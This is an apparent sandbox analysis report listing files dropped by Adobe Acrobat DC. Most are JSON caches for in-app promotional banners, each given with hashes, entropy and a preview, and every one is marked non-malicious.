                                                                                                                                                SHA-512:1973FD5B7757BBBC3D1EF5E83EAEDC52FB58F5ED27D9284EDBDE11E4DC3DE295F78766E7EDCF1C719FBE93854F01306CDB65308D72E8129A0C9913BCAEB78139
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):294
                                                                                                                                                Entropy (8bit):5.300028193458752
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YEQXJ2HXKVLmj455IRR4UhUR0Yz/oAvJfBD2G6UpnrPeUkwRe9:YvXKXiu45WRuUhUnAGR22cUkee9
                                                                                                                                                MD5:AA93BFC5FCCC7885745C82D35BC809D6
                                                                                                                                                SHA1:FF846ABB3158A5719A8692AFA8E372C5CE792AC2
                                                                                                                                                SHA-256:A6AA33A7B66EAA903670155DB1E3BA002AB0E193F9AC8AA4E9C6EFD046BDEBF8
                                                                                                                                                SHA-512:58532B7B1254148203046CFA1A5DFF4432FE209FCE92EC0B56949A798A22E72B06B58BF6547EBDD7CC559743091727B9572F4AD1B54C15AC9B26522E16D6E6FB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):285
                                                                                                                                                Entropy (8bit):5.360021963948857
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YEQXJ2HXKVLmj455IRR4UhUR0Yz/oAvJfPmwrPeUkwRe9:YvXKXiu45WRuUhUnAGH56Ukee9
                                                                                                                                                MD5:B9810F77263FD79366A04313B49368A4
                                                                                                                                                SHA1:626F87890CAE133AF8F3F303EC4A05F42C36D68F
                                                                                                                                                SHA-256:70DCFF495E5B4A15908DC0B548EE811F408372D2344B99448F2BBF170336ABD5
                                                                                                                                                SHA-512:B8814FFAEC7B5131C3C46A86E287F3C613391608E5EBF7552A518F575C0913F2E4DE035DB72DCF466D46A16A73CFB07AEDAA20E6D55A6E1807199B4774FE04C5
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1055
                                                                                                                                                Entropy (8bit):5.656314574269106
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Yv6X77UndpLgEscLf7nnl0RCmK8czOCCSw:Yvc7UndhgGzaAh8cv/w
                                                                                                                                                MD5:9C0202205CBAC3E592F57D8EEE896D9E
                                                                                                                                                SHA1:98135F357611D3BC4168F7C2971BB55DDC4A4F3E
                                                                                                                                                SHA-256:800400979541E4C91545A8BAF0F0B185F979924107DCF1A9193BD6326EE02698
                                                                                                                                                SHA-512:4F9CDE1406B23326189756C9FBA4C2A1AB728702BE46AB53D9158B4887B17095713DB05AB8DC2DCA14380B265E061AA559D7468C19ABC56A72995389D1F8753E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"92038_285529ActionBlock_1","campaignId":92038,"containerId":"1","controlGroupId":"","treatmentId":"eb1a4bce-8215-46f1-b44c-154b21a85d60","variationId":"285529"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNhdElkIjpudWxsfQ==","dataType":"application\/json","encodingScheme":tr
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1050
                                                                                                                                                Entropy (8bit):5.652217187869635
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Yv6X77UnBVLgEF0c7sbnl0RCmK8czOCYHflEpwiVx:Yvc7UnBFg6sGAh8cvYHWpww
                                                                                                                                                MD5:2C79C186EA275959DE2DC3D06D35A2FA
                                                                                                                                                SHA1:0D5552B48C947E32E6B48C6ACA1EFBB1530B6AAE
                                                                                                                                                SHA-256:024FC0FAD3D23374568715A08E8677DFCD771DB5B0604294E030DB537622F4BE
                                                                                                                                                SHA-512:70FC895ECB30D052737B21446A2FAD572AD70982B913F0DAFD97C2253653B88F430B49C35EEB3D2B674520A46E5850FF6F689D29E3365850BB71E38696804733
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_0","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"0924134e-3c59-4f53-b731-add558c56fec","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuZm9ybXMgJiBhZ3JlZW1lbnRzLiJ9LCJ0Y2F0SWQiOm51bGx9","dataType":"application\/json","encodingScheme":true},"
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):292
                                                                                                                                                Entropy (8bit):5.310449162835145
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YEQXJ2HXKVLmj455IRR4UhUR0Yz/oAvJfQ1rPeUkwRe9:YvXKXiu45WRuUhUnAGY16Ukee9
                                                                                                                                                MD5:29BB4FC1FB6B2B7F234DA88AEBC54F40
                                                                                                                                                SHA1:A9A94C30F30D10F2B76E8980C82E35C9AC7C0BF1
                                                                                                                                                SHA-256:728DC5EDBBFA418D7B371B309AB80EE4ACA797D9E09CC8B05E7CF23E57665A30
                                                                                                                                                SHA-512:D7477EB17AF5D0169CF1EF9E6790E4163FAE5295F31830D88CE1388C7AC2E4D3EB91E84BB3DB3F0446DB8035C497A40B9610E704B44C4DFA1A94EE03D9EC3E24
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1038
                                                                                                                                                Entropy (8bit):5.647177175747057
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Yv6X77Unw2LgEF7cciAXs0nl0RCmK8czOCAPtciBx:Yvc7Unwogc8hAh8cvAz
                                                                                                                                                MD5:5DD9C00AE7D616102E837B5A94B9F856
                                                                                                                                                SHA1:E79159864E34A9A47040A5F2295ACC73E64029B4
                                                                                                                                                SHA-256:89BAC73351BD0BE8BCBDD2C36DA25DBFB9AA67FF4286A1888083C7900D38A63E
                                                                                                                                                SHA-512:D496173AA6C019D22D691EBB34A703D63B5AE8138DBC1635A407E3553AC626FD7C9D8EE766B3130CC37310FEBA7526A191C007E13389055BD1C0C351310124CE
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85534_264855ActionBlock_1","campaignId":85534,"containerId":"1","controlGroupId":"","treatmentId":"49d2f713-7aa9-44db-aa50-0a7a22add459","variationId":"264855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVkaXQgdGV4dCwgaW1hZ2VzLCBwYWdlcywgYW5kIG1vcmUuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1744
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1164
                                                                                                                                                Entropy (8bit):5.69545336569479
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Yv6X77Un4KLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5x:Yvc7Un4EgqprtrS5OZjSlwTmAfSKv
                                                                                                                                                MD5:A5A70909D5468DC98C4C9FF3B9E04AB4
                                                                                                                                                SHA1:13A293CEE458B448A5EBA109CB393B21B597B3D2
                                                                                                                                                SHA-256:12017C66B7F5ADDB381E4AE3484D3DA86045C61F946E5E19A270D1509DEAF8F4
                                                                                                                                                SHA-512:3A5171731E6BF2D8B7AA11FA3ECD304353D7ACB9F44BE3673A6D3F7511471DBFA3FE719846B49CD1A6E4C6D5B9C7ACAEDB6DC8C2686AF4FCA36261F9BA547ABC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):289
                                                                                                                                                Entropy (8bit):5.314813781905326
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YEQXJ2HXKVLmj455IRR4UhUR0Yz/oAvJfYdPeUkwRe9:YvXKXiu45WRuUhUnAGg8Ukee9
                                                                                                                                                MD5:60FB54DC65289A6D905E7E1BF446D3C5
                                                                                                                                                SHA1:66604D5C97E31F9DC940635F5123C7C23AA6F722
                                                                                                                                                SHA-256:53F3E279FBFD971A797A8E4F3AB22251BFCE9F469BA0A2C22B6B0A745806EC1C
                                                                                                                                                SHA-512:81450231CA0563229871825995E7D8AE12A0922784899F44FE05C02FA42CD8E634D9E26897E57397A7E5CD5615CDB62502BB6B99A1ADEF0BDE29567DB278DB80
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1395
                                                                                                                                                Entropy (8bit):5.76599805076669
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Yv6X77UnXrLgEGOc93W2JeFmaR7CQzttgBcu141CjrWpHfRzVCV9FJNJ:Yvc7UnXHgDv3W2aYQfgB5OUupHrQ9FJv
                                                                                                                                                MD5:9CE482D4BFA548733F4B66C2CED2E6EB
                                                                                                                                                SHA1:165A5F3B3F84B9A627B94502E02276ABB633455F
                                                                                                                                                SHA-256:15F9533A8E99A75763123ECEC36781E976B85AA6D71D3FCCE5B797CA4ADE4F94
                                                                                                                                                SHA-512:C76D86D77166D3A61A7F57E5D5E2DADE97966DDA557F029A6061D4548F395269C37EC0AA8263E3538AFB8BBB8D7FF7E768BE752A2829A9106B61C64709ECB76F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_RHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"57802_176003ActionBlock_0","campaignId":57802,"containerId":"1","controlGroupId":"","treatmentId":"d0374f2d-08b2-49b9-9500-3392758c9e2e","variationId":"176003"},"containerId":1,"containerLabel":"JSON for Reader DC RHP Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctRGF5IFRyaWFsIiwiZ29fdXJsIjoiaHR0cHM6Ly9hY3JvYmF0LmFkb2JlLmNvbS9wcm94eS9wcmljaW5nL3VzL2VuL3NpZ24tZnJlZS10cmlhbC5odG1sP3RyYWNraW5naWQ9UEMxUFFMUVQmbXY9aW4tcHJvZHVjdCZtdjI9cmVhZGVyIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEyIiwiZm9udF9zdHlsZSI6IjMifSwidGl0
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):291
                                                                                                                                                Entropy (8bit):5.298259066645133
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YEQXJ2HXKVLmj455IRR4UhUR0Yz/oAvJfbPtdPeUkwRe9:YvXKXiu45WRuUhUnAGDV8Ukee9
                                                                                                                                                MD5:1912E174736ED54F03F4699F12677D54
                                                                                                                                                SHA1:E4F2B151A90A6590320787A3B5E1335B292CA73D
                                                                                                                                                SHA-256:12039365E9162ABF9A2EB09960FAB4AABFAA16861E2C9B4F12CDA842155F5C9C
                                                                                                                                                SHA-512:5D81F4FF8F223F441A46A854E8E532DC47F383405721D213DC9A7F7343214474173CA6AB46D06441F99C41D732EE8012F70E012CE37000C7B6F27A19D784FA6A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):287
                                                                                                                                                Entropy (8bit):5.301195681732056
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YEQXJ2HXKVLmj455IRR4UhUR0Yz/oAvJf21rPeUkwRe9:YvXKXiu45WRuUhUnAG+16Ukee9
                                                                                                                                                MD5:722BDFCE1D64209D6707F46207B0E52D
                                                                                                                                                SHA1:6F1C6DFCA705C123CD98F89B908ACED5E299C9C5
                                                                                                                                                SHA-256:8993E4A11B5C622E1988AA02AD5591A8FF555F09CD59C858DCC78F3B93A613BB
                                                                                                                                                SHA-512:666B8DF16CCDC927824A50F83416BF448C450B815403E0C4FE7C0C220CE40348F6B689FAD3E979AD18A226DD4268CDB68AD5B349B52C7EE49BDE58063EEBABA2
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):5.625459521324607
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:Yv6X77UnlamXayLgE7cMCBNaqnl0RCmK8czOC/BSw:Yvc7UnZBgACBOAh8cvMw
                                                                                                                                                MD5:60BA76D69F1035623226E2FD553002E3
                                                                                                                                                SHA1:CFFE1AFFC6B7243387845913E079E4DE1D71EA31
                                                                                                                                                SHA-256:F77B4E6A03A5C91533900F066FBC46AB541E561FEC0185B528CF2E6F4955B174
                                                                                                                                                SHA-512:E3B26B67F4BE855BE111E1D6A24526FD918D373E2BBAB9CD7AFEB7BE16260748A0E61E1AA5AFAF73EA9CEAEA095816BD8804F7771E3BF8D7EC8DF087F7E63851
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"92038_285529ActionBlock_0","campaignId":92038,"containerId":"1","controlGroupId":"","treatmentId":"6291f52b-6cb0-4d31-bc46-37ce85e9eb25","variationId":"285529"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"application\/json","encodingScheme":true},"endDTS":1751323379000,"s
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286
                                                                                                                                                Entropy (8bit):5.276392926536777
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:YEQXJ2HXKVLmj455IRR4UhUR0Yz/oAvJfshHHrPeUkwRe9:YvXKXiu45WRuUhUnAGUUUkee9
                                                                                                                                                MD5:C9F7B972E977E800AE96271C341A2E3E
                                                                                                                                                SHA1:F0AD03AB2E4EC31552B62EC99D7F6788230C7440
                                                                                                                                                SHA-256:295175600E824F1B41CE3ED278F5631BF27FB1277EBD777CD35C8C4C62D4C319
                                                                                                                                                SHA-512:55B2B5B818A42F375DADAFDFF07783CB9107773FD6150CE8123F270B3A3BA4CAC25D98E30696FD9333C353D2D63EEE2E51F50BE5EF03ACBC00BB920474E9DDC9
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):782
                                                                                                                                                Entropy (8bit):5.358795474369984
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:YvXKXiu45WRuUhUnAGTq16Ukee1+3CEJ1KXd15kcyKMQo7P70c0WM6ZB/uhW9:Yv6X77Un2168CgEXX5kcIfANhw
                                                                                                                                                MD5:F6E7A060D53501C1134B248452A23444
                                                                                                                                                SHA1:F9184A402CB8037E10CC82BFB0A44FC195C77558
                                                                                                                                                SHA-256:A72716A5673426F955849E971A2F145F302E20E0241EA373A40FDFBBB9B0AFD4
                                                                                                                                                SHA-512:B8C23AA977AF9BD95244FE668DDC945175508FA977BA01F5DF794D342FB17F054D1E3EA29D40C0F37168104818282BC169E958D5D6EA036516D8406F0F53B052
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"analyticsData":{"responseGUID":"c0420e00-b083-4d79-9283-b2c1df1202d0","sophiaUUID":"5E8BF9F5-1E3B-447C-A619-6054B1C06D0A"},"encodingScheme":true,"expirationDTS":1730307392081,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"Edit_InApp_Aug2020"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"20360_57769ActionBlock_0","campaignId":20360,"containerId":"1","controlGroupId":"","treatmentId":"3c07988a-9c54-409d-9d06-53885c9f21ec","variationId":"57769"},"containerId":1,"containerLabel":"JSON for switching in-app test","content":{"data":"eyJ1cHNlbGxleHBlcmltZW50Ijp7InRlc3RpZCI6IjEiLCJjb2hvcnQiOiJicm93c2VyIn19","dataType":"application\/json","encodingScheme":true},"endDTS":1735804679000,"startDTS":1730134052109}}}}
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4
                                                                                                                                                Entropy (8bit):0.8112781244591328
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:e:e
                                                                                                                                                MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:....
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2818
                                                                                                                                                Entropy (8bit):5.130989479762093
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:YydRu5PD+DXtGKQEEfDfGTEDZap4zuIoWqvGXGcud9EewJD:qJ6G7rf1+Tl3BNwh
                                                                                                                                                MD5:C475144E4221C5D091C428BCF846C908
                                                                                                                                                SHA1:7B9766CCE1C18A724A6C1C71436C2B8273F90B4B
                                                                                                                                                SHA-256:94F96DFD61FE2FF50AF0AC9C790D50B7BCC885E692341B7EA33D40D211B07A9D
                                                                                                                                                SHA-512:6B08D6ABEF17F39E2947B447C3E374ABAEC229EF6063E12D37E7BF78578E3E47915EBC2A2E2C51900407D2CD86A4F0902AC33CE89FD469191DC7DBC76C984432
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d79127b33b8769e6ebc46dd116f9e58c","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1050,"ts":1730134051000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"587588fa49b5f98a3cc83357da1117c9","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1730134051000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"cf109c8cf2ab37ccc648a6f4e810434e","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1026,"ts":1730134051000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"42d17dd4639b1dc92182b56575ff01e9","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1055,"ts":1730134051000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"7af72be4e3cb853caf880a6b41d5d883","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1038,"ts":1730134051000},{"id":"Edit_InApp_Aug2020","info":{"dg":"c63032bfd0e82965f83a9526a1c6c46b","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":17
                                                                                                                                                Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):12288
                                                                                                                                                Entropy (8bit):0.9872980207348405
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:TLHRx/XYKQvGJF7urs67Y9QmQ6QeKfIcLESiAieSfF:TVl2GL7ms67YXtrKQcI8ut
                                                                                                                                                MD5:DEFA9139D5E22A4B349B5FE81823ACF4
                                                                                                                                                SHA1:8AF2FE533E8FABFAEBA0C672E3204942FEA77B6A
